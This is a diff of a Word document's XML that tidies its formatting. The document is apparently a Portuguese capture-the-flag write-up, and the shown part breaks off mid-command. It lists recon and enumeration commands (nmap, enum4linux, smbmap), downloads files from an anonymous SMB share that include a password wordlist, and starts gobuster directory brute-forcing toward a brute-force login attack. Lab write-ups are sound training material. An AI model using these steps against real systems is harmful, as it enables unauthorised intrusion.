-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> até a escalada de privilégios para se obter controle total sobre as máquinas. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1916,23 +1834,6 @@
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:smallCaps/>
           <w:color w:val="000000"/>
@@ -1941,7 +1842,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1954,7 +1854,6 @@
         </w:rPr>
         <w:t>Desenvolvimento</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1997,25 +1896,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sempre começando com um simples </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve">Sempre começando com um simples nmap, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2074,79 +1955,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>ip_target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t xml:space="preserve"> nmap –sS –sC &lt;ip_target&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2251,25 +2060,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>: enum4linux &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>ip_target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&gt; </w:t>
+        <w:t xml:space="preserve">: enum4linux &lt;ip_target&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2296,43 +2087,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>smbmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –H &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>ip_target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t xml:space="preserve"> smbmap –H &lt;ip_target&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2410,171 +2165,55 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve">Há 2 que é possível analisar, mas o foco agora é no ”anonymous”. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Comando usado:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> smbclient  //&lt;ip_target&gt;/anonymous</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Há 2 que é possível analisar, mas o foco agora é </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>no ”</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>anonymous</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">”. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Comando</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>usado</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>smbclient</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  /</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ip_target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;/anonymous</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:noProof/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ABB1010" wp14:editId="75643590">
             <wp:extent cx="5610225" cy="590534"/>
@@ -2635,18 +2274,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>download .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para download .</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2672,25 +2301,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>mget</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> *</w:t>
+        <w:t xml:space="preserve"> mget *</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2768,114 +2379,24 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com os arquivos baixados, o primeiro a ser </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>analizado</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> será o “log1.txt”. Uma </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>wordlist</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>aonde</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> há uma pequena quantidade de supostas senhas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">O outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>write</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>up</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, já foi possível determinar isso.</w:t>
+        <w:t>Com os arquivos baixados, o primeiro a ser analizado será o “log1.txt”. Uma wordlist, aonde há uma pequena quantidade de supostas senhas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>O outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do write up, já foi possível determinar isso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2953,43 +2474,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com as duas informações, é necessário um diretório para realizar um ataque </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>bruteforce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Com o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> isso é possível. </w:t>
+        <w:t xml:space="preserve">Com as duas informações, é necessário um diretório para realizar um ataque bruteforce. Com o gobuster isso é possível. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3001,7 +2486,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3011,152 +2495,17 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Comando</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
+        <w:lastRenderedPageBreak/>
+        <w:t>Comando usado:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>usado</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -w /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/share/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dirb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
